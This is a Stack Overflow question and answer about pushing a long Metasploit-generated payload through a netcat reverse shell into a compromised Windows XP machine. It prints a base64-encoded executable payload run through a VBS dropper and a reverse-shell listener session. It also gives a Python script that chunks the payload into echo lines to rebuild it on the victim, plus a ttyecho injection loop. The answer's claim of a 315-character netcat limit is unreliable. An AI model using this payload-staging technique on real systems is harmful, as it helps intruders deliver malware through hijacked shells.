How to send long string in netcat - cmd shell?

0

For security tests, a vbs script called msf.vbs is created which used to execute payload generated by metasploit. ex:

cscript.exe %temp%\msf.vbs <payload>

If the script is used in cmd.exe on localhost, everything goes well. But if it is used in netcat cmd shell, the payload will be broken. ex:

  • origin payload size: 6160
  • netcat handle payload size: 4068

My questions as follow:

  1. What's the reason that the whole payload is not transmited ?
  2. How to send long string in netcat - cmd shell ?

Crash demo

root@sh:~# nc -v -l -p 4444
listening on [any] 4444 ...
192.168.1.104: inverse host lookup failed: Unknown host
connect to [192.168.1.105] from (UNKNOWN) [192.168.1.104] 1749
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\test\Desktop>cscript.exe %temp%\msf.vbs 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
cscript.exe %temp%\msf.vbs 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
Microsoft (R) Windows Script Host Version 5.7
Copyright (C) Microsoft Corporation. All rights reserved.

C:\DOCUME~1\test\LOCALS~1\Temp\msf.vbs(1, 823) (null): 0x800700C1
netcat
asked on Stack Overflow Nov 1, 2016 by debug

1 Answer

0

What's the reason that the whole payload is not transmitted ?

There is a size limit in NC that prohibits any transmission longer than 315 chars. Your char length is 6,188.

How to send long string in netcat - cmd shell ?

Break it down. The follow python script will do that for you (its set to break at 80 chars fits nice and neat into the terminals - credit for the script goes to: OS-18568) so the transmission works fine, and then rejoins them in 123.hex file by using a technique in MS-DOS to echo several times into a single line:

#!/usr/bin/python

import sys

def split_by_length(s,block_size):
    w=[]
    n=len(s)
    for i in range(0,n,block_size):
        w.append(s[i:i+block_size])
    if w[-1].isspace():
        del w[-1]    
    return w

with open(sys.argv[1]) as file:
    for line in file:
        line = line.rstrip('\n')
        # if line is longer than 80
        if len(line) > 80:
            # split line
            newlines=split_by_length(line,80)
            # if line starts with space, create space at the end of previous line
            # echo|set /p and <nul set /p remove leading spaces/tabs and equal signs
            for index, newline in enumerate(newlines):
                                if newline.startswith(" "):
                                        newlines[index-1] = newlines[index-1] + " "
 # rewrite lines
            for index, newline in enumerate(newlines):
                # 1st line: remove echo and create line with no carriage return
                if index == 0:
                    newline = newline.replace("echo ","",1)
                    newline = 'echo|set /p="' + newline + '"  >>123.hex'
                # last line: add echo
                elif index == len(newlines)-1:
                    newline = "echo " + newline
                # middle lines: create line with no carriage return and add >> 123.hex
                else:
                    newline = 'echo|set /p="' + newline + '"  >>123.hex'
                print newline
        else:
            print line

The question that you didn't ask, but might be the next one -

How do I then get this broken down information into my terminal running my reverse shell?

You'll need the following application: ttyecho Found here: https://github.com/buglessdr/ttyecho

Then once that is done you can run the following small bash script to bring it all together:

while read -r line; do /git/ttyecho/ttyecho -n /dev/pts/0 "$line"; done < commandsplit.txt

Hint - to figure out which terminal has the session you can use the following command:

tty
answered on Stack Overflow Jul 19, 2017 by Bob

User contributions licensed under CC BY-SA 3.0